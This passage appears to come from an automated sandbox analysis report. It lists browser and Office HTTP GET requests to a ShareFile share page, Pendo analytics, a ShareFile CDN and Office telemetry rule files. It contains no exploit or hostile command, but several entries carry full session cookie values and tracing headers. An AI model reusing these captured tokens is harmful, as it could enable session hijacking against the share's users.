gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /guide.-323232.1622565221517.css HTTP/1.1Host: citrix-sharefile-content.customer.pendo.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /io/public/Shares(189361297164461c)?%24expand=Items%2CItems%2FBundle%2CUser%2CUser%2FPreferences%2CCreator%2CCreator%2FAccount%2CItems%2FZone&includeExpired=false HTTP/1.1Host: premierbb.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"tracestate: 3347059@nr=0-1-294030-30142649-7b6a7a3fda6e0714----1728497132574traceparent: 00-016347dae24e7ba5cef94e0f4835b6a8-7b6a7a3fda6e0714-01Accept-Language: ensec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36newrelic: eyJ2IjpbMCwxXSwiZCI6eyJ0eSI6IkJyb3dzZXIiLCJhYyI6IjI5NDAzMCIsImFwIjoiMzAxNDI2NDkiLCJpZCI6IjdiNmE3YTNmZGE2ZTA3MTQiLCJ0ciI6IjAxNjM0N2RhZTI0ZTdiYTVjZWY5NGUwZjQ4MzViNmE4IiwidGkiOjE3Mjg0OTcxMzI1NzQsInRrIjoiMzM0NzA1OSJ9fQ==X-BFF-CSRF: trueAccept: application/json, text/plain, */*X-SF-App: ShareFileWebsec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://premierbb.sharefile.com/share/view/189361297164461cAccept-Encoding: gzip, deflate, brCookie: aws-waf-token=e96a2a16-7e3c-4b99-96e2-f45ab76b2885:EQoAc9l+wdRaAAAA:/zpzslzW74rRLa3+zDOmw9rkfwXqxw3hg+C0B6RR1rwP+TFlS+j/rN6T5YAqeSFtuKBv64TmcZxw+FB4DvYzSE9F/nCN9xkaReQU6+4e1XKoYVzylG+ZEFjO3lBhFfQa5LcjyT/OTFbgqwxbY7ud+FaudFZjJcnCD/zRD8M7TjDIDBCHkaF+EZItW62z8QtlNJ1YsFG6u2rH+9Bg9h1j5y6EC730H93gxv6EHbOFGWN4RaHfN37zY0efjlP3JFIT; AWSALBTG=btBDUfknnNRktrMoHgmPj8UpBrjLz+T7E8j8++Kc35dzbIkMKKt4k6AO1F8cbtPe143jjqIsR7RcHkAbdAPL0/Y9lXyV6VRUONTUcmk1+WGsa8hCoQMWeRRwhFkLo1+kt21o9HEwdb6Ymr8WQC/t0pzZcx63GfFxM4YksY3mr2Fw; AWSALBTGCORS=btBDUfknnNRktrMoHgmPj8UpBrjLz+T7E8j8++Kc35dzbIkMKKt4k6AO1F8cbtPe143jjqIsR7RcHkAbdAPL0/Y9lXyV6VRUONTUcmk1+WGsa8hCoQMWeRRwhFkLo1+kt21o9HEwdb6Ymr8WQC/t0pzZcx63GfFxM4YksY3mr2Fw; AWSALB=ZogKx2lixzlC08Obsu5Z3yZJPqbyuxARFmK2BQduxAGbEyE5K/6ZhSjWkA1XQ/j07H6N4jbI6+3M0CdOZs/AiSrPL6HjqQbiI14JW4iqb9Ey/9nF4V6tcdfVAFD4; AWSALBCORS=ZogKx2lixzlC08Obsu5Z3yZJPqbyuxARFmK2BQduxAGbEyE5K/6ZhSjWkA1XQ/j07H6N4jbI6+3M0CdOZs/AiSrPL6HjqQbiI14JW4iqb9Ey/9nF4V6tcdfVAFD4
            Source: global trafficHTTP traffic detected: GET /bundles/3aa33bb6fffd83a61c47.svg HTTP/1.1Host: premierbb.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=e96a2a16-7e3c-4b99-96e2-f45ab76b2885:EQoAc9l+wdRaAAAA:/zpzslzW74rRLa3+zDOmw9rkfwXqxw3hg+C0B6RR1rwP+TFlS+j/rN6T5YAqeSFtuKBv64TmcZxw+FB4DvYzSE9F/nCN9xkaReQU6+4e1XKoYVzylG+ZEFjO3lBhFfQa5LcjyT/OTFbgqwxbY7ud+FaudFZjJcnCD/zRD8M7TjDIDBCHkaF+EZItW62z8QtlNJ1YsFG6u2rH+9Bg9h1j5y6EC730H93gxv6EHbOFGWN4RaHfN37zY0efjlP3JFIT; AWSALBTG=btBDUfknnNRktrMoHgmPj8UpBrjLz+T7E8j8++Kc35dzbIkMKKt4k6AO1F8cbtPe143jjqIsR7RcHkAbdAPL0/Y9lXyV6VRUONTUcmk1+WGsa8hCoQMWeRRwhFkLo1+kt21o9HEwdb6Ymr8WQC/t0pzZcx63GfFxM4YksY3mr2Fw; AWSALBTGCORS=btBDUfknnNRktrMoHgmPj8UpBrjLz+T7E8j8++Kc35dzbIkMKKt4k6AO1F8cbtPe143jjqIsR7RcHkAbdAPL0/Y9lXyV6VRUONTUcmk1+WGsa8hCoQMWeRRwhFkLo1+kt21o9HEwdb6Ymr8WQC/t0pzZcx63GfFxM4YksY3mr2Fw; AWSALB=ZogKx2lixzlC08Obsu5Z3yZJPqbyuxARFmK2BQduxAGbEyE5K/6ZhSjWkA1XQ/j07H6N4jbI6+3M0CdOZs/AiSrPL6HjqQbiI14JW4iqb9Ey/9nF4V6tcdfVAFD4; AWSALBCORS=ZogKx2lixzlC08Obsu5Z3yZJPqbyuxARFmK2BQduxAGbEyE5K/6ZhSjWkA1XQ/j07H6N4jbI6+3M0CdOZs/AiSrPL6HjqQbiI14JW4iqb9Ey/9nF4V6tcdfVAFD4
            Source: global trafficHTTP traffic detected: GET /data/guide.json/74b07336-7560-45fc-7cd1-95032a784d52?id=12&jzb=eJyNj01r4zAQhv-LzrFlObZj-VZIWnLpBvoBy1LM2JokYmVJyHLCUvLfM84hSy-lN3v0fjzvJzvpUUcXtoo1rN1tnte_2tf26e_v7ePuXJ5hwxYM-t5NNt4kUGdlVkuRiG4lkroWVSIl1Ila7ctSFX0ny5wsUzAkPsbox4ZzH3DQGLouHY8QcK8Npr0b-O2PnzSeuajlshK5XImqKCrRU4Yz6v0_nJ2MWbABIyiIwJo7-fypv6E3YA8THJAUaNu3F3a5L5qt4P3aDaAtvX-hI-st9oeL9whxCjiy5g9zy6qkE9o-_PMRFVK-YR9U7KnAxod7PZ1ozsyWSS4ynmd5Qc4ThlG7GSlP80KmovXBKXa5XAHfzYXn&v=2.249.1_prod&ct=1728497131244 HTTP/1.1Host: citrix-sharefile-data.customer.pendo.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /bundles/b69d9728d2dbe0747c8a.js HTTP/1.1Host: premierbb.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=e96a2a16-7e3c-4b99-96e2-f45ab76b2885:EQoAc9l+wdRaAAAA:/zpzslzW74rRLa3+zDOmw9rkfwXqxw3hg+C0B6RR1rwP+TFlS+j/rN6T5YAqeSFtuKBv64TmcZxw+FB4DvYzSE9F/nCN9xkaReQU6+4e1XKoYVzylG+ZEFjO3lBhFfQa5LcjyT/OTFbgqwxbY7ud+FaudFZjJcnCD/zRD8M7TjDIDBCHkaF+EZItW62z8QtlNJ1YsFG6u2rH+9Bg9h1j5y6EC730H93gxv6EHbOFGWN4RaHfN37zY0efjlP3JFIT; AWSALBTG=btBDUfknnNRktrMoHgmPj8UpBrjLz+T7E8j8++Kc35dzbIkMKKt4k6AO1F8cbtPe143jjqIsR7RcHkAbdAPL0/Y9lXyV6VRUONTUcmk1+WGsa8hCoQMWeRRwhFkLo1+kt21o9HEwdb6Ymr8WQC/t0pzZcx63GfFxM4YksY3mr2Fw; AWSALBTGCORS=btBDUfknnNRktrMoHgmPj8UpBrjLz+T7E8j8++Kc35dzbIkMKKt4k6AO1F8cbtPe143jjqIsR7RcHkAbdAPL0/Y9lXyV6VRUONTUcmk1+WGsa8hCoQMWeRRwhFkLo1+kt21o9HEwdb6Ymr8WQC/t0pzZcx63GfFxM4YksY3mr2Fw; AWSALB=ZogKx2lixzlC08Obsu5Z3yZJPqbyuxARFmK2BQduxAGbEyE5K/6ZhSjWkA1XQ/j07H6N4jbI6+3M0CdOZs/AiSrPL6HjqQbiI14JW4iqb9Ey/9nF4V6tcdfVAFD4; AWSALBCORS=ZogKx2lixzlC08Obsu5Z3yZJPqbyuxARFmK2BQduxAGbEyE5K/6ZhSjWkA1XQ/j07H6N4jbI6+3M0CdOZs/AiSrPL6HjqQbiI14JW4iqb9Ey/9nF4V6tcdfVAFD4
            Source: global trafficHTTP traffic detected: GET /bundles/b79627b64df3ab63890d.js HTTP/1.1Host: premierbb.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=e96a2a16-7e3c-4b99-96e2-f45ab76b2885:EQoAc9l+wdRaAAAA:/zpzslzW74rRLa3+zDOmw9rkfwXqxw3hg+C0B6RR1rwP+TFlS+j/rN6T5YAqeSFtuKBv64TmcZxw+FB4DvYzSE9F/nCN9xkaReQU6+4e1XKoYVzylG+ZEFjO3lBhFfQa5LcjyT/OTFbgqwxbY7ud+FaudFZjJcnCD/zRD8M7TjDIDBCHkaF+EZItW62z8QtlNJ1YsFG6u2rH+9Bg9h1j5y6EC730H93gxv6EHbOFGWN4RaHfN37zY0efjlP3JFIT; AWSALBTG=btBDUfknnNRktrMoHgmPj8UpBrjLz+T7E8j8++Kc35dzbIkMKKt4k6AO1F8cbtPe143jjqIsR7RcHkAbdAPL0/Y9lXyV6VRUONTUcmk1+WGsa8hCoQMWeRRwhFkLo1+kt21o9HEwdb6Ymr8WQC/t0pzZcx63GfFxM4YksY3mr2Fw; AWSALBTGCORS=btBDUfknnNRktrMoHgmPj8UpBrjLz+T7E8j8++Kc35dzbIkMKKt4k6AO1F8cbtPe143jjqIsR7RcHkAbdAPL0/Y9lXyV6VRUONTUcmk1+WGsa8hCoQMWeRRwhFkLo1+kt21o9HEwdb6Ymr8WQC/t0pzZcx63GfFxM4YksY3mr2Fw; AWSALB=ZogKx2lixzlC08Obsu5Z3yZJPqbyuxARFmK2BQduxAGbEyE5K/6ZhSjWkA1XQ/j07H6N4jbI6+3M0CdOZs/AiSrPL6HjqQbiI14JW4iqb9Ey/9nF4V6tcdfVAFD4; AWSALBCORS=ZogKx2lixzlC08Obsu5Z3yZJPqbyuxARFmK2BQduxAGbEyE5K/6ZhSjWkA1XQ/j07H6N4jbI6+3M0CdOZs/AiSrPL6HjqQbiI14JW4iqb9Ey/9nF4V6tcdfVAFD4
            Source: global trafficHTTP traffic detected: GET /bundles/1c992ae0c14e95098d9a.js HTTP/1.1Host: premierbb.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=e96a2a16-7e3c-4b99-96e2-f45ab76b2885:EQoAc9l+wdRaAAAA:/zpzslzW74rRLa3+zDOmw9rkfwXqxw3hg+C0B6RR1rwP+TFlS+j/rN6T5YAqeSFtuKBv64TmcZxw+FB4DvYzSE9F/nCN9xkaReQU6+4e1XKoYVzylG+ZEFjO3lBhFfQa5LcjyT/OTFbgqwxbY7ud+FaudFZjJcnCD/zRD8M7TjDIDBCHkaF+EZItW62z8QtlNJ1YsFG6u2rH+9Bg9h1j5y6EC730H93gxv6EHbOFGWN4RaHfN37zY0efjlP3JFIT; AWSALBTG=btBDUfknnNRktrMoHgmPj8UpBrjLz+T7E8j8++Kc35dzbIkMKKt4k6AO1F8cbtPe143jjqIsR7RcHkAbdAPL0/Y9lXyV6VRUONTUcmk1+WGsa8hCoQMWeRRwhFkLo1+kt21o9HEwdb6Ymr8WQC/t0pzZcx63GfFxM4YksY3mr2Fw; AWSALBTGCORS=btBDUfknnNRktrMoHgmPj8UpBrjLz+T7E8j8++Kc35dzbIkMKKt4k6AO1F8cbtPe143jjqIsR7RcHkAbdAPL0/Y9lXyV6VRUONTUcmk1+WGsa8hCoQMWeRRwhFkLo1+kt21o9HEwdb6Ymr8WQC/t0pzZcx63GfFxM4YksY3mr2Fw; AWSALB=ZogKx2lixzlC08Obsu5Z3yZJPqbyuxARFmK2BQduxAGbEyE5K/6ZhSjWkA1XQ/j07H6N4jbI6+3M0CdOZs/AiSrPL6HjqQbiI14JW4iqb9Ey/9nF4V6tcdfVAFD4; AWSALBCORS=ZogKx2lixzlC08Obsu5Z3yZJPqbyuxARFmK2BQduxAGbEyE5K/6ZhSjWkA1XQ/j07H6N4jbI6+3M0CdOZs/AiSrPL6HjqQbiI14JW4iqb9Ey/9nF4V6tcdfVAFD4
            Source: global trafficHTTP traffic detected: GET /bundles/5be3ba1b444ac539eaf5.js HTTP/1.1Host: premierbb.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=e96a2a16-7e3c-4b99-96e2-f45ab76b2885:EQoAc9l+wdRaAAAA:/zpzslzW74rRLa3+zDOmw9rkfwXqxw3hg+C0B6RR1rwP+TFlS+j/rN6T5YAqeSFtuKBv64TmcZxw+FB4DvYzSE9F/nCN9xkaReQU6+4e1XKoYVzylG+ZEFjO3lBhFfQa5LcjyT/OTFbgqwxbY7ud+FaudFZjJcnCD/zRD8M7TjDIDBCHkaF+EZItW62z8QtlNJ1YsFG6u2rH+9Bg9h1j5y6EC730H93gxv6EHbOFGWN4RaHfN37zY0efjlP3JFIT; AWSALBTG=btBDUfknnNRktrMoHgmPj8UpBrjLz+T7E8j8++Kc35dzbIkMKKt4k6AO1F8cbtPe143jjqIsR7RcHkAbdAPL0/Y9lXyV6VRUONTUcmk1+WGsa8hCoQMWeRRwhFkLo1+kt21o9HEwdb6Ymr8WQC/t0pzZcx63GfFxM4YksY3mr2Fw; AWSALBTGCORS=btBDUfknnNRktrMoHgmPj8UpBrjLz+T7E8j8++Kc35dzbIkMKKt4k6AO1F8cbtPe143jjqIsR7RcHkAbdAPL0/Y9lXyV6VRUONTUcmk1+WGsa8hCoQMWeRRwhFkLo1+kt21o9HEwdb6Ymr8WQC/t0pzZcx63GfFxM4YksY3mr2Fw; AWSALB=ZogKx2lixzlC08Obsu5Z3yZJPqbyuxARFmK2BQduxAGbEyE5K/6ZhSjWkA1XQ/j07H6N4jbI6+3M0CdOZs/AiSrPL6HjqQbiI14JW4iqb9Ey/9nF4V6tcdfVAFD4; AWSALBCORS=ZogKx2lixzlC08Obsu5Z3yZJPqbyuxARFmK2BQduxAGbEyE5K/6ZhSjWkA1XQ/j07H6N4jbI6+3M0CdOZs/AiSrPL6HjqQbiI14JW4iqb9Ey/9nF4V6tcdfVAFD4
            Source: global trafficHTTP traffic detected: GET /bundles/4229061ac836f0f16eea.js HTTP/1.1Host: premierbb.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=e96a2a16-7e3c-4b99-96e2-f45ab76b2885:EQoAc9l+wdRaAAAA:/zpzslzW74rRLa3+zDOmw9rkfwXqxw3hg+C0B6RR1rwP+TFlS+j/rN6T5YAqeSFtuKBv64TmcZxw+FB4DvYzSE9F/nCN9xkaReQU6+4e1XKoYVzylG+ZEFjO3lBhFfQa5LcjyT/OTFbgqwxbY7ud+FaudFZjJcnCD/zRD8M7TjDIDBCHkaF+EZItW62z8QtlNJ1YsFG6u2rH+9Bg9h1j5y6EC730H93gxv6EHbOFGWN4RaHfN37zY0efjlP3JFIT; AWSALBTG=btBDUfknnNRktrMoHgmPj8UpBrjLz+T7E8j8++Kc35dzbIkMKKt4k6AO1F8cbtPe143jjqIsR7RcHkAbdAPL0/Y9lXyV6VRUONTUcmk1+WGsa8hCoQMWeRRwhFkLo1+kt21o9HEwdb6Ymr8WQC/t0pzZcx63GfFxM4YksY3mr2Fw; AWSALBTGCORS=btBDUfknnNRktrMoHgmPj8UpBrjLz+T7E8j8++Kc35dzbIkMKKt4k6AO1F8cbtPe143jjqIsR7RcHkAbdAPL0/Y9lXyV6VRUONTUcmk1+WGsa8hCoQMWeRRwhFkLo1+kt21o9HEwdb6Ymr8WQC/t0pzZcx63GfFxM4YksY3mr2Fw; AWSALB=ZogKx2lixzlC08Obsu5Z3yZJPqbyuxARFmK2BQduxAGbEyE5K/6ZhSjWkA1XQ/j07H6N4jbI6+3M0CdOZs/AiSrPL6HjqQbiI14JW4iqb9Ey/9nF4V6tcdfVAFD4; AWSALBCORS=ZogKx2lixzlC08Obsu5Z3yZJPqbyuxARFmK2BQduxAGbEyE5K/6ZhSjWkA1XQ/j07H6N4jbI6+3M0CdOZs/AiSrPL6HjqQbiI14JW4iqb9Ey/9nF4V6tcdfVAFD4
            Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /guide.-323232.1622565221517.css HTTP/1.1Host: citrix-sharefile-content.customer.pendo.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /guide-content/u6RYL2wEa9xrpUJMTeOXl41AeJI/qrJmWADnkufXgGqv6M-p2xBSYIU/xBPyrN0M2r6IFxno71T0shlp-Qc.dom.json?sha256=OG9P3pymuWfB-ZaKqljhBPBaH2alktLkYBmVTjLKrSQ HTTP/1.1Host: citrix-sharefile-content.customer.pendo.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://premierbb.sharefile.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /data/ptm.gif/74b07336-7560-45fc-7cd1-95032a784d52?v=2.249.1_prod&ct=1728497131241&jzb=eJzVkt9vmzAQx_8XPyeADQact2ntpkj7wZROWlVVyMCRWANMjUnEqvzvPacRal-iTdo0lSfs89197r7fu0dipx7IiqgKOqvqiSxIYfRhAJNb1WKEJiyNREJDyli8IHs1KKtNripMyrPrL1df85v848_b9YfswA_yGgvIstRjZ5_fyDTgQSrokhYJXaYpjZdCyHRZJTXnVVQWgjPMGU2Dj3fW9sPK93sDrQJTFN6wkwZq1YBX6tY_nfy9goNPUxHGlCFZHEUxLbFGb3Q_kNUj0U2V_w6oe_cSthub5l-NeEQ-hO_sjSzWcy_7fCD8FtdrN4yG7zMZCYUtaiNbOAX3ZZFNn6ZJbzcZl3u3rgEeRuhK1CdAwSYLOHfE2XExC9qClRfFFG9EzDOk-73E2chuO8qtGx26_PvGLfzM7lJl31_pVqoO468wMPVPRqtB2tG4dd8RHcYcr1AHM_UWKsD6DbmflX43t8erSlrHFgifBj4LWISZezCD0g6JeSwSHs1x6uqvW2VwTU7hH2sRF5DVv7bfNrvPWfrKSXR2Ek_CF05qtKwuOSlEC74JJ7lBzviMh2Hk0WD-4v-0dDYvPYyD4_0TChW3Tg HTTP/1.1Host: citrix-sharefile-data.customer.pendo.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /guide-content/eWI7aCe5RTaQQM3QzyK1rqqWcVM/XNJ1F6ATudKnb82a7viL5T2TM6g/E7DHnb1hOIm90y1iNNrpyuqjzow.dom.json?sha256=tTDEghJvK4ZEfjp-b5MZyPzNBxZZo7r5FOjFFYmu8iA HTTP/1.1Host: citrix-sharefile-content.customer.pendo.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://premierbb.sharefile.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-dynamic-forms-pilet/1.25.0/package/dist/402b74053d26323596b3.woff2 HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://premierbb.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-dynamic-forms-pilet/1.25.0/package/dist/main.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-dynamic-forms-pilet/1.25.0/package/dist/af15e31c70fab7cfd55c.woff2 HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://premierbb.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-dynamic-forms-pilet/1.25.0/package/dist/main.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /io/public/Shares(189361297164461c)?%24expand=Items%2CItems%2FBundle%2CUser%2CUser%2FPreferences%2CCreator%2CCreator%2FAccount%2CItems%2FZone&includeExpired=false HTTP/1.1Host: premierbb.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=e96a2a16-7e3c-4b99-96e2-f45ab76b2885:EQoAc9l+wdRaAAAA:/zpzslzW74rRLa3+zDOmw9rkfwXqxw3hg+C0B6RR1rwP+TFlS+j/rN6T5YAqeSFtuKBv64TmcZxw+FB4DvYzSE9F/nCN9xkaReQU6+4e1XKoYVzylG+ZEFjO3lBhFfQa5LcjyT/OTFbgqwxbY7ud+FaudFZjJcnCD/zRD8M7TjDIDBCHkaF+EZItW62z8QtlNJ1YsFG6u2rH+9Bg9h1j5y6EC730H93gxv6EHbOFGWN4RaHfN37zY0efjlP3JFIT; AWSALBTG=xjBKAoFRwB+gN81rIT4KxK3i2luwTz1/AweRMKBGClAeom+bcKsr6xyFcGkC0IPC1BBadkg/d48eL9w4HxLlM4llTW7fL9zHlNb/p8dgO8Wze1Jp62LwknNRRM6gqijqMatn/ADsfYY7oVLJkTLgUJ8MjOMZK/uuOcC1Ajm30ha0; AWSALBTGCORS=xjBKAoFRwB+gN81rIT4KxK3i2luwTz1/AweRMKBGClAeom+bcKsr6xyFcGkC0IPC1BBadkg/d48eL9w4HxLlM4llTW7fL9zHlNb/p8dgO8Wze1Jp62LwknNRRM6gqijqMatn/ADsfYY7oVLJkTLgUJ8MjOMZK/uuOcC1Ajm30ha0; AWSALB=0opcWZSRNR3dBAlQH5AuKZZm3NZgGwsmVzBn0WccmyoLvkOgXzxOXk1mwbCetkbgQ5Vjmtnjf7m94q4/8cKhnd/AuhU+H6mP3DCNMYWGo6XdaQzlU6aDiJSm2xMc; AWSALBCORS=0opcWZSRNR3dBAlQH5AuKZZm3NZgGwsmVzBn0WccmyoLvkOgXzxOXk1mwbCetkbgQ5Vjmtnjf7m94q4/8cKhnd/AuhU+H6mP3DCNMYWGo6XdaQzlU6aDiJSm2xMc
            Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
